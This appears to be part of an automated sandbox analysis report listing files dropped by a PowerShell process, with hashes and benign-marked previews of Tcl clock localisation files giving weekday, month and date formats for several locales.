                                                                                                                                                                                                                      SHA1:085EDC3D027D6B5A6A6A2561717EA89C8F8B8B39
                                                                                                                                                                                                                      SHA-256:A636A82C7D00CCDC0AF2496043FFA320F17B0D48A1232708810D3BB1453E881E
                                                                                                                                                                                                                      SHA-512:18ADB77314FCFD534E55B234B3A53A0BC572AB60B80D099D2F3B20E0C5FE66179FDC076AA43200DB3CA123BC6216989EC41448FA624D3BA9633413AD8AD6034C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset be DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0430\u0442"\.. "\u0441\u0440"\.. "\u0447\u0446"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset be DAYS_OF_WEEK_FULL [list \.. "\u043d\u044f\u0434\u0437\u0435\u043b\u044f"\.. "\u043f\u0430\u043d\u044f\u0434\u0437\u0435\u043b\u0430\u043a"\.. "\u0430\u045e\u0442\u043e\u0440\u0430\u043a"\.. "\u0441\u0435\u0440\u0430\u0434\u0430"\.. "\u0447\u0430\u0446\u0432\u0435\u0440"\.. "\u043f\u044f\u0442\u043d\u0456\u0446\u0430"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset be MONTHS_ABBREV [list \.. "\u0441\u0442\u0434"\.. "\u043b\u044e\u0442"\.. "\u0441\u043a\u0432"\.. "\u043a\u0440\u0441"\.. "\u043c\u0430\u0439"\.. "\u0447\u0440\u0432"\.. "\u043b\u043f\u043d"
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1871
                                                                                                                                                                                                                      Entropy (8bit):4.4251657008559935
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:43EUAIlnQf/QVdQ81mnEZqEavWQEQ3QvQrQL0QjQTtQDCQSY4tqP:27xMk+nEZqE3biIYbUi+C9y
                                                                                                                                                                                                                      MD5:E5225D6478C60E2502D18698BB917677
                                                                                                                                                                                                                      SHA1:52D611CB5351FB873D2535246B3A3C1A37094023
                                                                                                                                                                                                                      SHA-256:CFE4E44A3A751F113847667EC9EA741E762BBDE0D4284822CB337DF0F92C1ACA
                                                                                                                                                                                                                      SHA-512:59AB167177101088057BF4EE0F70262987A2177ECB72C613CCAAE2F3E8D8B77F07D15DA5BE3B8728E23C31A1C9736030AA4036A8CD00A24791751A298B3A88B3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bg DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0434"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset bg DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u043b\u044f"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0412\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0421\u0440\u044f\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u044a\u0440\u0442\u044a\u043a"\.. "\u041f\u0435\u0442\u044a\u043a"\.. "\u0421\u044a\u0431\u043e\u0442\u0430"].. ::msgcat::mcset bg MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset bg MO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2335
                                                                                                                                                                                                                      Entropy (8bit):4.107102006297273
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR835e/MWrD//6HFEVcVVcCVcTUTVckVEVcT7VcEEVcby/Vcn0VcMr/0VcM8VcQ:43ktX++QalMObalMZ6IE6V
                                                                                                                                                                                                                      MD5:5D25E7FC65824AC987535FEA14A4045C
                                                                                                                                                                                                                      SHA1:85C10F05823CD3263FC7B3EC38796BEC261B3716
                                                                                                                                                                                                                      SHA-256:890EA6521DEB1B3C3913CCD92562F6360E064DAEE2E2B0356A6DD97A46264A1F
                                                                                                                                                                                                                      SHA-512:5D8A88ACAEBBF3CD721F288FA0F1FEE517EE568CA5482E30CFA1E36CD37DF011C449090E2D9041F1D046A191F13D4C5C4B6F9E2F16FD259E63CE46ECC4E4F81F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):265
                                                                                                                                                                                                                      Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                      MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                      SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                      SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                      SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1152
                                                                                                                                                                                                                      Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                      MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                      SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                      SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                      SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1354
                                                                                                                                                                                                                      Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                      MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                      SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                      SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                      SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1208
                                                                                                                                                                                                                      Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                      MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                      SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                      SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                      SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1276
                                                                                                                                                                                                                      Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                      MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                      SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                      SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                      SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):847
                                                                                                                                                                                                                      Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                      MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                      SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                      SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
                                                                                                                                                                                                                      SHA-512:D63F34024356F5CE0335D14EA557F4BBF238CCA8265DD27C039C70F7F28FE737F368B030DEE10B2C536512D2815E1F5B19838D08745C6A76A39050D573597EB3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_AT MONTHS_ABBREV [list \.. "J\u00e4n"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_AT MONTHS_FULL [list \.. "J\u00e4nner"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset de_AT TIME_FORMAT "%T".. ::msgcat::mcset de_AT TIME_FORMAT_12 "%T".. ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1276
                                                                                                                                                                                                                      Entropy (8bit):4.389082225723362
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR83B8VSysVB8VsZKKgJ5Mm47fpK26aSIui7dHqWZ0ZIlj5VevjevbDvW:43Bt1VBbZKKgJs6qx1Wc5VojobzW
                                                                                                                                                                                                                      MD5:C351057D8E5328C0790901D1F4DBEC9F
                                                                                                                                                                                                                      SHA1:F73DE8AEF7F8083B0726760AA003E81067A68588
                                                                                                                                                                                                                      SHA-256:532845CD15EC821C1939D000C648694A64E8CA8F0C14BAD5D79682CF991481CE
                                                                                                                                                                                                                      SHA-512:8152AD082D0A6A4EBE7E1CCA9D4A5F2E48ABE3F09F4385A517C523A67CA3B08E0F20C193D0F6850F37E55ED0CD6FBD201FE22CC824AF170976D04DB061212F2D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \.. "Son"\.. "Mon"\.. "Die"\.. "Mit"\.. "Don"\.. "Fre"\.. "Sam"].. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de_BE MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_BE MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::m
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2304
                                                                                                                                                                                                                      Entropy (8bit):4.371322909589862
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:4aR833v+ZYYWtv+nWfFyL1NYOg+EKVJQ19tWQYmYaYRn9sWuSAJIJ6eRa6WrmdlX:43/pZyLjY0uYR9QmdkjC9r
                                                                                                                                                                                                                      MD5:7DD14B1F4FF532DCAF6D4C6F0DF82E9A
                                                                                                                                                                                                                      SHA1:707875FEF4207EBB71D066FDC54C7F68560C6DAD
                                                                                                                                                                                                                      SHA-256:8B23E0E2F0F319BB9A2DFDCCDC565FF79A62FA85094811189B6BC41594232B6B
                                                                                                                                                                                                                      SHA-512:5ECA072DE5DD7890270AE268C7C8D40EE2DB6966643604D16E54194DB0AD74FDA8D04848331E61B387E8B494AF18252E38671D939069EC4C90C672A629563B88
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \.. "\u039a\u03c5\u03c1"\.. "\u0394\u03b5\u03c5"\.. "\u03a4\u03c1\u03b9"\.. "\u03a4\u03b5\u03c4"\.. "\u03a0\u03b5\u03bc"\.. "\u03a0\u03b1\u03c1"\.. "\u03a3\u03b1\u03b2"].. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \.. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\.. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\.. "\u03a4\u03c1\u03af\u03c4\u03b7"\.. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\.. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\.. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\.. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"].. ::msgcat::mcset el MONTHS_ABBREV [list \.. "\u0399\u03b1\u03bd"\.. "\u03a6\u03b5\u03b2"\.. "\u039c\u03b1\u03c1"\.. "\u0391\u03c0\u03c1"\.. "\u039c\u03b1\u03ca"\.. "\u0399\u03bf\u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):307
                                                                                                                                                                                                                      Entropy (8bit):4.896073290907262
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoCwmGjbmvFjoCws6W3v1oCws6W3v6p6HyFjoCwmT+3vjbe:4EnLB383QrmdSs6W3vss6W3v6QSoJ3ve
                                                                                                                                                                                                                      MD5:5B31AD8AC0000B01C4BD04BF6FC4784C
                                                                                                                                                                                                                      SHA1:F55145B473DDCAE38A0F7297D58B80B12B2A5271
                                                                                                                                                                                                                      SHA-256:705C66C14B6DE682EC7408EABDBA0800C626629E64458971BC8A4CBD3D5DB111
                                                                                                                                                                                                                      SHA-512:1CCE6BCAE5D1F7D80E10687F0BCA2AE1B2DD53F04A0F443DC9B552804D60E708E64326B62BA4E3787325D89837B4AC8CCCA9AF6F39CBD654BCC8A9C27EA63BB8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):312
                                                                                                                                                                                                                      Entropy (8bit):4.870560620756039
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoCr3FuoCsX3vtfNrsoCsX3v6YNIdjoCs+3v3FnN9vn:4EnLB383H3Fb3vtNN3v6y43v3FnNNn
                                                                                                                                                                                                                      MD5:DDA87ACED97F9F7771788A1A0A1E4433
                                                                                                                                                                                                                      SHA1:E221653CD659C095098180344654770FF059331B
                                                                                                                                                                                                                      SHA-256:BC87754A253C1036E423FA553DA182DBC56F62A13EDA811D8CD9E8AFA40404A6
                                                                                                                                                                                                                      SHA-512:BB95D9241B05686CA15C413746DD06071635CB070F38847BE9702397A86C01A3D54DEBE1ACAA51834AB74DB8D0F75E353995183864E382721425756EE46B0B1E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z".. ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):257
                                                                                                                                                                                                                      Entropy (8bit):4.915769170926952
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xosmGMoss6W3v6ay/5osmT+3vR6HyFvn:4EnLB383hr8s6W3v6ay/hJ3voSVn
                                                                                                                                                                                                                      MD5:4CBF90CE15ECCB6B695AA78D7D659454
                                                                                                                                                                                                                      SHA1:30C26ADB03978C5E7288B964A14B692813D6E0B8
                                                                                                                                                                                                                      SHA-256:EC48F18995D46F82B1CC71EA285174505A50E3BA2017BCCE2D807149B7543FD0
                                                                                                                                                                                                                      SHA-512:CC809EBD1B2B5D9E918C2E2CE4E7075DFB0744C583F17C1C234D8437EF0C34654D2F09FF77544AD3430CEC78ABC70AA5F85F71AD1489A687B8087FCDFE07B088
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_BW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_BW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):295
                                                                                                                                                                                                                      Entropy (8bit):4.87629705076992
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoAhgqyFjoAZF3vX5oAZF3v6cvBoAh9+3vnFDL8vn:4EnLB383FhgqWDZF3vVZF3v6cvdhI3vM
                                                                                                                                                                                                                      MD5:BFC4A48F5B10D137A4D32B440C47D3C6
                                                                                                                                                                                                                      SHA1:C90EF2A8291DE589BC12D0A5B8AF2F0B00FEB7CD
                                                                                                                                                                                                                      SHA-256:3CF2D0937FD95264549CF5C768B898F01D4875A3EB4A85D457D758BC11DFEC6E
                                                                                                                                                                                                                      SHA-512:A91B81A956A438CA7274491CA107A2647CBDFB8AEB5FD7A58238F315590C74F83F2EBA4AA5C4E9A4A54F1FC1636318E94E5E4BBEA467326E0EACED079741E640
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_CA DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_CA TIME_FORMAT "%r".. ::msgcat::mcset en_CA TIME_FORMAT_12 "%I:%M:%S %p".. ::msgcat::mcset en_CA DATE_TIME_FORMAT "%a %d %b %Y %r %z"..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):286
                                                                                                                                                                                                                      Entropy (8bit):4.892405843607203
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:SlSyEtJLl73oo6d3/xoEbtvqyFjoELE3vLjoELE3v6mjoEbto+3vnFDoAkvn:4EnLB383BbtvqWHLE3vTLE3v6EbtF3vW
                                                                                                                                                                                                                      MD5:52E55DE8C489265064A01CEEC823DCDD
                                                                                                                                                                                                                      SHA1:16F314A56AE0EAC9DAD58ADDEA6B25813A5BAA05
                                                                                                                                                                                                                      SHA-256:C2CE5B74F9E9C190B21C5DF4106303B7B794481228FB9A57065B9C822A1059C3
